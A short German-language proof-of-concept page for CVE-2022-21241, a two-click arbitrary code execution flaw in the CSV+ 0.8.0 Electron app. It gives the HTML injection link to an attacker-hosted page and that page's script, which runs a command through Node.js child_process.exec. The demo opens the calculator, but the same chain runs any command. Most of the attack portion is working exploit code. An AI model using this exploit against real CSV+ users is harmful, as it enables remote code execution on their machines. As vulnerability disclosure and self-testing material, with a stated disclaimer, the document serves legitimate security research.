
👻 [PoC] CSV+ 0.8.0 - Beliebige Codeausführung (CVE-2022-21241)
👻 2-Klick-Schwachstelle zur Ausführung beliebigen Codes.

CVE-2022-21241
⚠
Dieser PoC wurde erstellt, um Benutzer zu warnen und Schwachstellen in ihrer eigenen CSV+ zu untersuchen. Die Nutzung für Angriffe ist untersagt.
Die folgenden Versionen sind betroffen.
Angreifer können mithilfe der Node.js-Funktionalität beliebigen Code ausführen. Sie platzieren den bösartigen JavaScript-Code auf einer Website und verlinken ihn über a-Tags mithilfe der HTML-Injection-Schwachstelle in CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html ist ein temporärer Link.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>